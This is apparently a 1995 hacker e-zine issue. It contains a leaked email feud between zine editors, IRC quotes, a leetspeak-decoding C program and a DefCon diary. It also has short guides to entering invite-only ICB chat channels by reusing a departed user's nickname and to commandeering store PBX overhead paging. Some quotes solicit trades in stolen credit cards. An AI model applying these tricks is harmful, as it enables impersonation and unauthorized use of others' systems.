Gray Areas
Who's On Your Side?
by FEH Staff

"I didn't have anything against her until she threatened me."
-Emmanuel Goldstein

It is not all fun and games when you are publishing a hacker oriented zine
for profit. Two of the most well known, 2600 and Gray Areas, after what seemed
like outward respect for each other, have fallen into name calling and threats.
Netta has threatened to take this to the people, so here they are...

Date: Tue, 14 Nov 95 01:21 EST
From: grayarea@gti.net (Gray Areas Inc.)
To: emmanuel@2600.com
Subject: shame
Status: RO

it's a shame u did not tell me u4ea calls ur home on a friendly basis to talk
to phiber who i believe is still on federal probation. please answer this
before i take it public on the net. it's one thing for dennis and u4ea to fuck
with me and my company. it's far another for you to be AT ALL involved in it.
my logs show u message dennis every time he's on irc trying to get in better
with him. i am not at all pleased to see the pieces of the puzzle fitting
together as if you are befriending them so they will fuck with me and my
company instead of you and yours. i've stuck up for you when people wanted to
fuck you up. i wish you had the sense to at least stay out of this, or to have
been truthful with me that you have chosen to side with them.

p.s. this mail is intended for your eyes only. my last two calls to you were
discussed with other people. if you wanna discuss my business with kc and your
other friends, rest assured i'll tell (severe threats omitted).

---

Date: Tue, 14 Nov 95 01:35 EST
From: grayarea@gti.net (Gray Areas Inc.)
To: emmanuel@2600.com
Subject: Re: shame
Status: RO

um, no. u seem to like the idea of me giving you what i have. it's a one-way
street. it's enuf to say "phiber is wigging out at that memory of yours."
i've done all of the talking to you i'm ever gonna be able to do i guess. as
for what your involvement is, that's what i offered you the opportunity to
comment on before this went further. i'll now let other people decide. there
are LOTS of people interested in both you and phiber. you of all people should
know that everything you do in this scene is practically public record and
that interfering with the existence of another publication is a serious legal
matter.

---

From: Emmanuel Goldstein <emmanuel@2600.com>
Subject: Re: shame
To: grayarea@gti.net (Gray Areas Inc.)
Date: Tue, 14 Nov 1995 01:46:06 -0500 (EST)

well, then you leave me little choice. from what i can see, you're either
writing your own fiction now or you've been duped by somebody else. either
way, i cannot allow you to threaten friends of mine with this nonsense.
i strongly suggest you tell me specifically what you're talking about before
this gets out of control.

---


<---------------------------------------------------------------------------->



*******************************************************
*** FEH Eleet Quotes for the month of December 1995 ***
*** Assembled By SnoNinja ***
*******************************************************

<emmanuel> at least i have a real life
<Geoman> cheeseball: I am working on unix not linux
<Zeed> PMF is the best hacker I know
<|al|> everyone will be elite for 15 minutes.
<Ace> i'll hack your FBI computer in a second!
<eggplant> i wanna be associated with golden showers
<ReDragon> I contract some of my coding out to SnoNinja
*Vision23* listen ReD, you're a fucking punk. I don't
have the time to waste figuring out how to ICMP bomb
whatever machine you're on, so for now I'll have to
settle for words. You're a real popular name. So noone
will suspect it was me who committed digital murder.
<_X> it took me 15 minutes to remember someones name
<loq> FEH HAS LESS USEFUL INPHO THAN ALL OTHER ELECTRONIC MAGAZINES COMBINED
<bianca7> hey anyone here willling to trade aol accounts for cc#'s?
<-[ReDragon]-> don't do that
<TheMaster> this could be a *Really* Stupid question, but im
trying to get password file here at the U of A, and ive tryed
in all the places where text files say to look, and so far all
ive been able to find is /etc/passwd. that may look to be the
correct thing..
<Gentry> try not to op fools.
<Anlk> Anyone want to trade "sitez" (Ftp site with pirated comercial software)
or CC's (Stolen Credit Card Information), msg me. Let's talk.
<miguel> how can i make a war games dialer?
<techness> im looking for phiber_optik... have you seen him lately??
* begin quote
<bugs_> exactly. FEH is too closely scrutinized, too high profile
<ReDragon> YER ARTICLE ON INFILTRATING GOVERNMENT SITES ROOLZ BUGS
<bugs_> oh well, there is always plausible deniability to fall back on
* end quote
<ip> LEMME IN FEH 4 OR I'M NOT GIVING YOU ANY AFRO GREEZE
<_X> -r-x------ 1 root root 698170 May 18 1995 free.org.passwd*
<Okinawa> I got a program, 64,000 linez of code, and it does nothing
<Okinawa> not bad
<Okinawa> at least it compiles clean
<UpLink> FEH is dope
<SnoNinja> I am whoring myself for quotes
*Crax* IF YOU DIE I'LL REFUND YER MONEY
* begin quote
<SnoNinja> Why would you rm any site?
<force> cuz I am a fucking gangster
* end quote
<force> no one can be as lame as me
<violator_> linux is the mac daddy os.. but not on a mac
[BigAl:bigal@carroll.com] hey dude you a pro? I need help
[wierd:bob@netaccess.on.ca] feh kicks ass, i am just a beginner now, but
one day i will be great
*monk202* Feh cracks me up. I LOVE IT! This is what Phrack should've been...

<---------------------------------------------------------------------------->

---=== T H E ===---
--
-- -- ---- -- -- --
-- -- -- -- -- --- -- -- --
--- --- -- -- -- - ---

  
-- -- ---- -- -- --

---=== L I S T ===---
Allen 3. Smith

Greetz to: all the homies hangin w/ the cool posse. Nigs in
the house. 007, james kahn, marissa tomei, 8o8 state,
011-posse, the leets, e-paq, all the j00s, whatney's
cream stout, aol lamerz, all bofh's, phase dist,
optik n3rve, BNF, Kleene, feynman, turing, shannon,
nyquist, kernighan, pike, VSB, QAM, NRZ, and most of all
to the #hack chicks.

word
werd
wird
wurd
w1rd
w3rd
w0rd
whord
wherd
whird
wh1rd
wh3rd
wh0rd
wirred
w1rred
worred
w0rred
wirr3d
w1rr3d
worr3d
w0rr3d
whirred
wh1rred
whorred
wh0rred
whirr3d
wh1rr3d
whorr3d
wh0rr3d



<---------------------------------------------------------------------------->

Mac's Vs. PC's
Artikle By nicotine
(The one that hangz on #hack not #korea)
aka `nic0tine


wh4zz4p:x0x,xgirl,redragon,katana,mudman,snoninja,l0ra,vampirella,lynch,
tigger,ice-9,roach,kemo,strict9,hosaka,andtherestofthehappy#hackfamily.

Listen to this. This has been a long debate of people, basically the result is
that the people that want it easy but more expensive and not as much software
choose makz, and the people that want it hard but less expensive and lots
more software choose pc's, but now since the "PC Exchange" for makz can
change shit over it's kinda changed... makz are better for webin' and aol
and pc's for hacking and shit.

PC's Very Own Debate:
"Forget That Makz Are Lame"
from "The Real Cyberpunk Fake Book":
Macs are easy, but they insulate you from the gory component-level HARDWARE
hackery, and it's all the kard swapping, IRQ fiddling, dipswitch setting,
chip pulling, and tooth gnashing that make the intel based PC world very
cyberpunk (haqr like). Using a mak makes it a hurl of a lot harder to achieve
deep geekhood, and you're far less likely to build up really neat piles of
old interface kardz, motherboards, and obsolete hard drives. (Although
maks have their own tools JUST TO OPEN THEM UP which you could leave around
looking like you are doing an open heart surgery.)

Also, you never hear of people building macs from the 3 various catalogs and
from the dumpster behind Joe's Bait and Chip shop. YOU CAN DO THIS WITH PC'S,
and any extra parts around your apartment around your home and give it that
hacker feeling.

Novelist Umberto Eco compared the mac operating system to the Catholic church.
Believers (Users) Must approach god (the hardware) through a thick layer of
churchy indirection and simplification (icons, symbols, point-and-click),
while DOS is very Protestant--you're responsible for achieving ON YOUR OWN,
damn it, and confess your sins DIRECTLY to GOD, AND NO KISSY FACED ICONS
BETWEEN.
-THE END-
-----------------------------------------------------------------------------
ICB hacking
There is a chat program called ICB (Internet Citizens Band).
Lots of times there is an invite only channel and I will
Explain to you how to get into one without being invited.

First you must monitor the channel and wait until someone leaves (signs off)
and then change your nick to what their nick WAS. Enter the channel.
How this works:
The ICB server keeps a list of people who are invited into the channel.
It keeps their nick, not their address, so if anyone enters the invite only
channel then it will think it iz them.

comments? questions? pizza? sex? talk?
nicotine@deeptht.armory.com

<---------------------------------------------------------------------------->

How Tew Hax0r An ATM Macheene
by shadow tao

tew buyld aye tao-box yew will need:

1. a beeg kardbord box. (get one that had a cold-macheene or a
sw1shee-woosh-woosh macheene)
2. sum sizzors.
3. a voyce.
4. sum crayons. (prufurablee 486/60 cray-olas.)
5. a red box.
6. a dollor b1ll.

ok!@ get da big box (nota big redboxdumbass!) and kutt slits inda
front and draw on it like dis:

_______________________
/______________________/|
| maytag atm dood! ||
| ==== <-------- card sl1tt!!
|free ||
|warez! xxx <------------tape red bocx here!@#
| xxx ||
|qw1k xxx ||
|kash! ||
| ==== <-------- kash sl1tt!!
|______________________|/


okay! now that you have done this! hide in the box and wait for
sukkerrz!!! wen the sukkerz put ther kard in! wate forr the kodez!! if
joo donut here da kode! say:

"um...please speak the kode into da box..er...atm."

but! besure that you say it in a robotvoyce or dey will call da pigz!
once joo gotda kodes, steek the doller out da kash sl1tt adn say:

"boopboopboop! macheene errer! pleeze go away!!!!!!"

wate for sukkerr to leeve adn run adn useda kodez! runrunrun! da
sukkerrz got da gunz!

if he dosnot go away adn wonts his kardd bak say:

"um. no."

if he still won't go away - offer h1m warez!

dont put da box in da rode! yu wil be run over! if peepul see yu in
da box say yu are da magic atm elf! offer dem warez!

<---------------------------------------------------------------------------->

.--[An official]----------------------.
: .-----. .-----. .--.--. :
: : .--' : .--' : : : :
!_-:: : `--. : `--. : . : ::-_!
:~-:: :: .--' :: .--' :: : ::-~:
: ::.: ::.`--. ::.: : :
: `--' `-----' `--'--' :
`----------------------[Production]---'
(pretty phat ascii eh?)

Title: Department store PBX overhead paging for the elite
Author: Tele Monster (telmnstr) (tm)

1. Intro
--------

HAVE YOU EVER BEEN INTO A DEPARTMENT STORE AND GOT TIRED OF HEARING SOME
RASPY HOMEGIRL UP FRONT TALKING OVER THE INTERCOM. SECURITY TO BLOCK 12A.
WE GOT SOME LOST BRAT NAMED MICHELLE AT COURTESY DESK. SOMEONE TO THE
ELECTRONICS DEPARTMENT. BOOOOP.

NOW ITS _YOUR_ TURN TO TAKE TO THE INTERCOM AND SPILL YOUR THOUGHTS.
THATS RIGHT, TELL THAT OLD WAL*MART GREETER WHAT YOU THINK OF HIM, AND
HOW HE WON'T GREET TEENAGERS BECAUSE HE THINKS THEY ARE ALL SPOILED SCUM.
TELL THAT BITCH THAT WON'T HELP YOU IN THE ELECTRONICS DEPARTMENT THAT
SHE IS UNOFFICIALLY FIRED. LAY OFF THE ENTIRE STAFF. USE YOUR IMAGINATION.

2. How
------

First you must go into your store of choice. Once inside, scope out
the camera bubbles and how many cops are there. This generally
doesn't matter as they don't care who says what over the intercom. There
isn't a law that says you can't talk on the phones provided in the aisles.
(There is however a law that says no shouting fire in a theatre, keep
that in mind. This also applies to no shouting fire in a wall*mart.
Oops. This is too new school.)

NOW YOU MUST FIND THE TELEPHONES. THESE ARE GENERALLY ON A POLE THAT
SUPPORTS THE ROOF. GOOD THING THOSE POLES ARE THERE, EH? ANYWAYS. IN MANY
STORES THEY MARK THE POLE AT THE TOP SO YOU CAN SEE IT ALL OVER. THE ONES
WITH FIRE EXTINGUISHERS ARE NORMALLY MARKED WITH A RED ARROW OR RED LINE
AROUND THE TOP. WALL*MART MARKS THEIR TELEPHONE POLES (HAHA) WITH A BLUE
BAND AROUND THE TOP. THE OTHER TWO STORES (REMEMBER THEY ARE GENERALLY
REGIONAL SO NO USE IN TALKING ABOUT THOSE SPECIFICALLY HERE) FOLLOW THE
SAME WAY EXCEPT IT IS A BLUE ARROW POINTING DOWNWARD WITH "PHONE"
WRITTEN ON IT. W0RD.

(lets take it to the really really old school)
NOW YOU MUST DETERMINE THE TYPE OF TELEPHONE SYSTEM USED. SOME POPULAR
ONES ARE NORTHERN TELECOM MERIDIAN SYSTEMS AS WELL AS COMDIAL. AT&T SPIRIT
AND MERLIN SYSTEMS MAY BE USED, BUT THEY ARE GENERALLY AVOIDED BECAUSE OF
AT&T'S GREED. THEY ARE JUST TOO EXPENSIVE. ROLM/SIEMENS AND TOSHIBA ARE
SOME MORE POPULAR BRANDS. ONCE AGAIN ROLM IS GENERALLY FOR BIG PLACES, NOT
BOBOSQUATNOT STORES.

ANYWAYS ONCE YOU SCOPE OUT YOUR TELEPHONE YOU MUST THEN FIGURE OUT HOW TO GET
ON THE OVERHEAD. SOME STORES ACTUALLY HAVE WHAT LOOKS LIKE JUST A NORMAL
TELEPHONE HOOKED TO THE KSU. THIS REALLY SUCKS WHEN THIS HAPPENS. Hopefully
there will be an extension list next to, under or on the handset. Look for
PAGE, OVERHEAD or anything close (PGE, OVRHEAD). Intercom is generally for
station to station communication. They might just plug the audio amplifier
into one of the extensions, it depends. Generally though, there will be this
BIG PHAT button that says... PAGE. On the comdial systems, you will notice
that there might be a light under the button or over the button that comes on
when someone talks over the overhead. Look on the other phones to see if an
arrow appears on the LCD screen or led lights when they talk. This can easily
narrow it down. If you are on a normal bobo handset just dial something and
when you get someone ask, "What is the extension for the overhead page."
"69 why who is this?" "thank you <click>" .. Pick up romp on the 69 and
kwakbam. Jibbie jibbie jibbie jibbie.
(I lost the old school touch)

I forgot where I was... hmmm.
Anyways. If it is the Meridian (Awwyea) system, and the key isn't labeled,
keep hitting all of the buttons until you hear yourself grunting twelve times
as loud.
Generally Wall*Mart phones have somewhat of a low audio level over the page.
The Meridian at Hills department store is really loud, as they use the outside
paging horns as the speakers. The louder the more funny, but you gotta do it
with attitude or else it is easy to start laughing. It sounds pretty pathetic
to the normals in the store when they hear, "Hi you hahahah bahahahahah
<Click> boop"

One wall*mart near us converted over to the old style telephones (No buttons,
just a normal 12 key keypad.. still on a pbx though) because of problems of
unauthorized overhead paging (that just sounds funny). If you are REALLY
BALLSY and these phones used a standard 2 line hybrid interface into the pbx,
you could go open up a cordless phone, plug it in for 20 minutes while you
hang out and jam Just Like Heaven on the toy pianos as the NiCad recharges.
Then plug the cordless in where the phone was (check first to make sure it
isn't an RJ-45 connector. If all else fails, the cordless will fry). If all does
go well.. muhahah wireless mobile unauthorized overhead paging in a bobo
squatnot store.
(and hey, you didn't STEAL the phone cause its still in the store).

3. What to say
--------------

This is the hardest part. What to say. If you're a little twelve year
old you might just burp in the thing or something. But if you're a little older
you can only display your wrath of eliteness thru what you say and how you say
it.

"Yo wally world shoppers, You are the grand prize Winna!@# For the
next 10 minutes everything in the store you can fit in two shopping
carts is yours free. Limit one computer and sofa per customer. GO!"

(Bam. Every wallmart shopper kicks into supermarket sweep mode.)
** This might count as yelling Fire in a Wall*Mart. So contact your
nearest lawyer for some consultation first. :) If you care.
*** This hasn't been tested yet.
**** If you do it, tell me how it goes.
***** The host of supermarket sweep is sum guy with a sweater,
Thanks to h0trod for this info.

One case we did do in which we were caught was at a going out of sale
at a biglots store. They sell excess inventory, and have no sense of
humor. The conversation went like this:

over pa> "boop. Hi. MOM? MOM? ARE YOU THERE? No no I can't hear you"
Guy walks up from behind. Taps thy on the shoulders.
over pa> "Huh?"
Guy "See that exit door right there?"
over pa> "yea"
guy "I want to see you on the other side"
over pa> "Oh. so leave?"
guy nods yes.

That is the WORST thing that has ever happened when pa'ing. It's not
illegal to do stupid stuff like that.

Another one in a wally whirrled (wall*mart)
"Hi. I'd like to take this moment to mention that you all suck"
>"Security to sector 120"
"Cancel that security, go to sector Z. There isn't a problem"
Other lines that have been said:
"Aww yea 240 dolla's worth of puddin. At a wally world sale"
"Despite all my rage I still end up on the hills overhead page"
If you have wussy friends, they tend to run when you start talking.
It is most hilarious if there are non-employee shoppers all in the
aisle when you pick up and scream. They just give you that look and
some of them smile and laugh and stuff.

4. Quick reference to found pa/pbx systems
------------------------------------------
.---------------.----------------------.-------------------------------.
: Store         : PBX Brand            : To initiate page              :
`---------------'----------------------'-------------------------------'
  Wall*Mart       Comdial                PAGE button
  Macys           Unknown                ??
  Sams            Comdial                PAGE button
  Sears           Unknown                ??
  HQ Warehouse    Toshiba                ??
  FAO Schwarz     Unknown                ??
  Lowes           Meridian               ??
  Caldors         Unknown                ??
  Hills           Meridian               PAGE button
  Taco Bell       Unknown                ??
  K-mart          Unknown (standard)     66
  BJ's            Unknown                ??


* This can all change depending on what store and who installed their
telecom system. They don't have to contract it out on a national basis.

5. Other goofy ideas
--------------------
* Take an old walkman and add a rj-14 or whatever the hell the handset
connector is. Pin it out so that the audio from the walkman is piped
into the mic leads of the phone. Carry it in there and plug it in in
place of the handset. Take the handset and chuck it behind the maxi's,
pop page, press play and adjust the audio so it's clear.
* If you notice a nasty HUMMM noise on the pa, go to the customer
service desk after you say all of that mess, and notify them that
they have an audio isolation problem. Tell them they should put an
isolation transformer on the ac line or between the amp and pbx
system. Tell them there may be some signal loss using a transformer
on the audio line but with the shitty quality it doesn't matter
anyways. Generally the hum is at 60 hertz (same as AC line power).

bah. im tired of this article. so this is the e n d.

Greetz:CasretCgRedragonLoqDhateBl0keIppy
UhermW1ldMrhydeMisfitMr804MotherU4eaD_D
ErikbEmmanuelYomammaTheeJokerJulietOphie
LANshark][cemanGentry|al|t3AlbatrossMooks
GlennntsSet0nchmawdteklordVainrst0bias
sn0crashsnoNinjaXgirlL0raX,Y,Z,Aborted
and CYN0BYTE!@#

<---------------------------------------------------------------------------->

The Tales of oof.- (c) 1995 t3 Incorporated.

Once upon a shining tooth,
I witnessed thee his name was oof.
He spoke to me in lore of old,
about a land covered with mold.

It spawned small creatures,
all shapes and sizes,
some of them looked like cereal surprises.

They spoke a tongue called ancient foo,
reveled across the land,
and when the words were spoken true,
you knew who was in command.

These creatures came from miles around,
to hear the minister speak,
sometimes a few of the souls would ask
"do you know how to phreak?"

Then oof would roar with a thunderous laugh,
and wave his magic wand,
a flash of lightning and a puff of smoke,
and suddenly the creature was gone.

The creatures came to understand,
that sir oof was their own true god,
and when he heard them chanting so,
he bowed his head to nod.

And so this tale winds to an end,
with the master pleased with me,
I feel a sense of warmness when,
oof speaks to me.








<---------------------------------------------------------------------------->

The Elite Speak Filter
by SnoCrash



/* u4ea_filter 1.06 -- SnoCrash[FEH] */
/* Just start this up and paste lines of baffling u4ea-speak in. */
/* Nearly recognizable English text will pop out! */
/* Since u4ea-speak changes nearly every day, please send your */
/* additions to: snocrash@hackerz.org or snoninja@pussy.org */
/* compiles with: gcc -O2 -Wall -o u4ea_filter -s u4ea_filter.c */
/* Usage example: */
/* echo "y00 4r3 cl00l3$$, sn0d0rk" | u4ea_filter */
/* would produce: */
/* you are clueless snodork */

#include <stdio.h>
#include <stdlib.h>   /* exit() */
#include <string.h>
#include <ctype.h>

#define usage() { fprintf(stderr, "Usage: %s [infile] [outfile]\n", argv[0]); exit(1); }

FILE *out;

/* Print the English for one word. Matching is on the word's prefix, so  */
/* anything after the slang (e.g. the comma in "clooless,") is dropped.  */
/* Words arrive here after the character substitutions done in main().   */
void
filter_word(const char *word)
{
    /* Some of u4ea's favorite words. */
    if(!strncmp(word, "klooless", 8)) fprintf(out, "clueless");
    else if(!strncmp(word, "clooless", 8)) fprintf(out, "clueless");
    else if(!strncmp(word, "layme", 5)) fprintf(out, "lame");
    else if(!strncmp(word, "joo", 3)) fprintf(out, "you");
    else if(!strncmp(word, "o-day", 5)) fprintf(out, "0-day");
    else if(!strncmp(word, "fook", 4)) fprintf(out, "fuck");
    else if(!strncmp(word, "yoo", 3)) fprintf(out, "you");
    else if(!strncmp(word, "uaea", 4)) fprintf(out, "u4ea");
    else if(!strncmp(word, "kodez", 5)) fprintf(out, "codes");
    else if(!strncmp(word, "lozer", 5)) fprintf(out, "loser");
    /* "uzer" must be tested before its prefix "uze" */
    else if(!strncmp(word, "uzer", 4)) fprintf(out, "user");
    else if(!strncmp(word, "uze", 3)) fprintf(out, "use");
    else if(!strncmp(word, "gno", 3)) fprintf(out, "no");
    else if(!strncmp(word, "dood", 4)) fprintf(out, "dude");
    else if(!strncmp(word, "donut", 5)) fprintf(out, "don't");
    /* "m4h" has already become "mah" by the time it gets here */
    else if(!strncmp(word, "mah", 3)) fprintf(out, "my");
    else if(!strncmp(word, "iz", 2)) fprintf(out, "is");
    else if(!strncmp(word, "stewpid", 7)) fprintf(out, "stupid");
    else if(!strncmp(word, "reaiiy", 6)) fprintf(out, "really");
    else if(!strncmp(word, "klueless", 8)) fprintf(out, "clueless");
    else if(!strncmp(word, "kan", 3)) fprintf(out, "can");
    else if(!strncmp(word, "wewp", 4)) fprintf(out, "woop");
    else if(!strncmp(word, "telko", 5)) fprintf(out, "telco");
    else if(!strncmp(word, "eye", 3)) fprintf(out, "i");
    else if(!strncmp(word, "chooze", 6)) fprintf(out, "choose");
    else if(!strncmp(word, "eleet", 5)) fprintf(out, "elite");
    else if(!strncmp(word, "muzt", 4)) fprintf(out, "must");
    else if(!strncmp(word, "buzy", 4)) fprintf(out, "busy");
    else if(!strncmp(word, "ewe", 3)) fprintf(out, "you");
    else if(!strncmp(word, "tew", 3)) fprintf(out, "too");
    else if(!strncmp(word, "muh", 3)) fprintf(out, "my");
    else if(!strncmp(word, "pheel", 5)) fprintf(out, "feel");
    else if(!strncmp(word, "oph", 3)) fprintf(out, "of");
    else if(!strncmp(word, "giph", 4)) fprintf(out, "give");
    else if(!strncmp(word, "sum", 3)) fprintf(out, "some");
    else if(!strncmp(word, "timez", 5)) fprintf(out, "times");
    else if(!strncmp(word, "gewd", 4)) fprintf(out, "good");
    else if(!strncmp(word, "ur", 2)) fprintf(out, "you're");
    else if(!strncmp(word, "fuqed", 5)) fprintf(out, "fucked");
    else if(!strncmp(word, "yer", 3)) fprintf(out, "your");
    else if(!strncmp(word, "rox", 3)) fprintf(out, "rock");
    else if(!strncmp(word, "yew", 3)) fprintf(out, "you");
    else fprintf(out, "%s", word);
}

int
main(int argc, char **argv)
{
    FILE *in;
    char buf[100];
    char *t;
    size_t i;

    if(argc == 3){
        if((in = fopen(argv[1], "r")) == NULL)
            usage();
        if((out = fopen(argv[2], "w")) == NULL)
            usage();
    }else if(argc == 2){
        out = stdout;
        if((in = fopen(argv[1], "r")) == NULL)
            usage();
    }else{
        in = stdin;
        out = stdout;
    }
    while(fgets(buf, sizeof(buf), in)){
        /* Undo the character substitutions, then lowercase everything. */
        for(i=0; buf[i] != '\0'; i++){
            if(buf[i] == '\n'){ buf[i]='\0'; break; }
            else if(buf[i] == '4') buf[i]='a';
            else if(buf[i] == '3') buf[i]='e';
            else if(buf[i] == '1') buf[i]='i';
            else if(buf[i] == '!' || buf[i] == ';') buf[i]='l';
            else if(buf[i] == '0') buf[i]='o';
            else if(buf[i] == '$' || buf[i] == '5') buf[i]='s';
            else if(buf[i] == '@') buf[i]='a';
            else if(buf[i] == '7') buf[i]='t';
            else if(buf[i] == '+') buf[i]='t';
            buf[i]=(char)tolower((unsigned char)buf[i]);
        }
        /* strtok() returns NULL on an empty or all-space line, so test */
        /* every token, including the first, before filtering it.       */
        for(t=strtok(buf, " "); t != NULL; t=strtok(NULL, " ")){
            filter_word(t);
            fprintf(out, " ");
        }
        fprintf(out, "\n");
    }
    fclose(in);
    fclose(out);
    return 0;
}



<---------------------------------------------------------------------------->

A Lamer's Review of DefCon
by Zeed

You don't know how happy I was when I saw you come into #devo. I couldn't
believe my eyes. I had been trying to find out your email address from just
about everybody.
Well, now I know it ;)

How was your summer? I remember you said it was pretty cool.

My summer was my trip to CA, AZ, NV.
For the first 2 weeks, I stayed in California. I went to the beach, went to
trendy coffee houses, played pool in smoke infested game parlors, visited old
friends, went to malls, cruised around, talked to people on the phone, spent
money, etc..

It was fun, I was with my friend Brian most of the time. (You spoke to him on
the phone) I didn't meet Jill or Tiffany. Each for different reasons.
Jill didn't come to CA until like 2 days before I was to leave CA, and
Tiffany was 9 hours away and every time I tried to call her she was never home.
I think you were the only online friend I called the whole time I was there,
well Jill called me once. Anyways, I am so glad I got to talk to you.

When I was in CA, I went and saw some of the old houses I used to live in. We
drove by my old friend Mile's house. I don't know if it was good timing but
he was outside and we stopped and talked to him. It had been ages since I had
talked to him.

My friend Brian is off in AZ at a technical school called "High-tech
institute". It's a 1 year degree in electronics I think. Then he is going to
Australia for a year. His dad is Australian. He is turning into a party animal,
hehe. Those damn roommates of his ;)

Hmm, lets see....
Well here is the defcon summary.

Ryan, Brian and I arrived in Las Vegas around 5:00pm Thursday afternoon..
I got our hotel room and got all our bags in the room.
At like 8pm we drove to the Airport to pick up Melanie, Jake and maybe Brett
(if he showed).
Well first we went to Melanie's gate and soon we met up with Jake. We both
recognized each other cause we had each other's pics.
Then Melanie's flight came in.
She met us all and then we were off to the Hotel.
The first night we just talked a lot in my room, then we all went to eat at
some restaurant at the Excalibur. We talked a lot there.
Jake was really funny, he is outgoing and had all kinds of funny stories.
Btw, Brian, Ryan and I are all 18.
Jake is 21, and Melanie was 23.
Well, when we came back to the hotel we went for the Casino.
Jake got some beer and he got one for Ryan.
Melanie went off to play the Quarter slots, and Jake went to Drink and play
video poker.
Brian and Ryan were being told to leave the casino cause they weren't 21, so
I gave Brian a key and I went to where Melanie was playing the slots.
I played them too, for a while. Personally, I don't see how anybody could get
addicted to it. hehe, maybe that's cause I have a slot machine in my room ;)
Melanie was doing pretty well actually. We just played and played, until one
of the old ladies asked if I was 18, so I had to leave.
We all went to a couple more casinos..
Melanie followed me back to the hotel room.
We like watched TV.
We all went to sleep soon after that. Melanie had her own bed, and Jake,
Brian and Ryan insisted that I take the other bed. Though I told them they
could have it. It felt good in a way, I had been sleeping on the floor the
whole 2 weeks in CA.
Well the next morning we woke up (Isn't that a surprise) =)
We all got registered at the Defcon exhibit room.
I went and hung around Defcon, because I started noticing a bunch of familiar
faces. I talked for a long while.
Melanie is down with me soon and she spots Zoop.
Zoop was surprised to see me there, he is only like 16.
Zoop told me that he had been looking for Emily and Jason.
Zoop told me that Emily was wearing a t-shirt with a happy face on it.
Later I was sitting at a table in the casino with Melanie, Zoop and Brian,
and to my total surprise some guy introduced himself as "Andy Conov" to Mel.
I yelled out "Andy!!"
"This is Zeed" (You see, Andy and I are always online at night trading hacker
stuff, he is a good friend)
He didn't believe it was me at first.
He says: "I was expecting Zeed to be a short little guy, hehe"
I talked to Andy a long time, and you know. Andy was actually pretty much the
way I imagined him.
Anyways, Mel, Brian, Ryan and I all went to the Hard Rock Cafe to eat dinner.
Right before we left to walk to the parking lot, I spotted a tall nice looking
girl wearing a happy face t-shirt. I recognized her face from a gif too.
I stopped her dead in her tracks and said:
"Emily?!?"
"This is Zeed!"
I noticed this tall short haired guy in the background behind Emily staying
his distance from me.
I said "Is that Jason?"
She said "yes".
He like was trying to not get near me.. (We didn't always get along, hehehe,
I think he thought I might start something with him)
Well I gave her my room number and she gave me hers.
I told her that we were off to eat dinner and that we will be seeing each
other soon.
Well, we ate at the Hard Rock Cafe. I had a veggy burger ;)
Then we got back to the hotel room.
Brian, Ryan and Melanie kind of were ready for bed. I wasn't.
So I went to hang out at the Defcon room, there I met up with Zoop again.
We watched Hacker Jeopardy, and Jake was a contestant.
They were like handing out beers and stuff, it was a really lax environment.
People were just having pure fun.
In that room though were all kinds of neat people.
Winn Schwartau, he is the Author of "Information Warfare". He was the host of
Hacker Jeopardy.
The producer of the movies "War Games" and "Sneakers"
Erik Bloodaxe, famous hacker from the Legion of Doom
Dan Farmer, the Author of SATAN
and others...
During Hacker Jeopardy, I won a free t-shirt cause I was the only person who
could answer one of the questions. It was related to video games so =P
Well Hacker Jeopardy started winding down and beers were everywhere.
Right before we left, Zoop grabbed one for himself.
Zoop and I explored around the casino a while.
Andy found us again, and we all hung out in the lounge where they were playing
music.
Andy and his friend from Montana were a little tweaked though ;)
His friend tried to climb one of the fake palm trees in the lounge, hehe.
They were both acting really silly.
We talked some more.
Then Andy and his friend took off to go back to their hotel, Circus Circus.
Zoop and I went to the Excalibur to eat.
There, Zoop talked about some AOL secrets and I talked about some internet
ones.
I ordered a Chicken Quesadilla =9 It was too spicy though, hehe
Well, I finally got back to the hotel room at around 4am.
Everybody was sound asleep, I was afraid I might step on somebody, hehe.
A room for 2, with 5 people sleeping in it.

Well the next morning we hung out at the Defcon room again, and I met up with
all my friends from the Los Angeles 2600 meetings, it was cool.
While I was schmoozing around Defcon with my friends, Melanie won about $400
on the quarter slot machines.
It was this day that I noticed that maybe she wasn't having so much fun at
defcon.
(it's a long story, but in the end it turns out that she wanted to do more
things with just me)
(She didn't talk much, or say much. So I didn't really know what she wanted
to do)
(Though I did arrange a trip to a Dolphin show at the Mirage. )
(I think it was just a bunch of weird personal feelings about each other)
(I had kind of brought things down to a "friends" level before we met at
defcon)
(I did give her a big hug though, and a little silver dolphin necklace, cause
she loves dolphins)
(It's a long story, I don't know if you care to hear it or whatever.)
(I guess I had fallen in love with Melanie without even meeting her or even
knowing what she looked like)
(About 2 weeks before defcon, I kind of freaked out and slowed things down
majorly)
(I got so depressed over the whole thing, cause I knew I was making mel hurt
inside so much)
(She really wanted me to be her "close" friend, we had even made plans to be
roommates in OK)
(It was so hard to watch her feelings get hurt and for her to be sad, the
worst feeling of it was that I was causing all this)
(The reason I mention all this now and here, is because this all had a major
impact on what went on during the days in vegas.)
(It's still a painful thing for me, and something where I made lots of stupid
decisions)
(It's my fault, I am 18, never had a girl friend, and all this was just new
to me)
(btw, please don't talk about this to anybody)
(Maybe you understand? :)
Well where was I....
Oh yeah, well I met up with Andy and Zoop again.
We all talked, and had lots of fun.
My friend Ryan from San Jose even bumped into one of his old friends.
I went into the speaking room to record the speakers.
Well, the first thing I hear is:
"John! come here."
I turn around and it is Emily, sitting next to her friend Rudy (He was sort
of her chaperone).
I sat down next to Emily for a while, oddly enough I don't remember saying
much to her.
Then she left a while later.
I met up with Mel and Brian in this room while I recorded the speakers.
I saw Emily come in with Jason and they sat down somewhere else.
all of a sudden..
"FED!!!" (Somebody had spotted a fed)
So Dark Tangent grabs the microphone and begins to interrogate the fed, hehe.
So the guy whips out his Badge and waves it around showing it to everybody.
He gives his little resume type thing to Dark Tangent, and it turns out this
guy is a US Customs Agent.
Some of the speakers included:
an ex-CIA case officer.
ex-FBI director of computer division.
Computer security specialist.
There was even a little bit on women hackers. (They like profiled some women
from IRC)
and more neat people ;)
Well then things wound down...
Emily, Jason, and their friend Rudy (not akira) came up to my room.
It was a delicate situation, I knew that Melanie didn't really think all too
highly of Emily. Also, Melanie even admitted to me that she is jealous of
girls I talk to (This was on aol she told me this once). So I knew it might
be a weird situation.
But, Emily really wanted to meet Melanie.
Well Emily was really friendly with Melanie, and I thought it worked out ok.
Though mel didn't say much.
This gave me time to take pictures of Emily, hehe ;)
We all talked for a while..
Then they had to leave, and mel and I went to play slots.
She won more money, hehe, but then they kicked me out of the casino.
I went with Melanie to our room.
She started talking to me about if I was going to visit her in Nov. out in
Oklahoma.
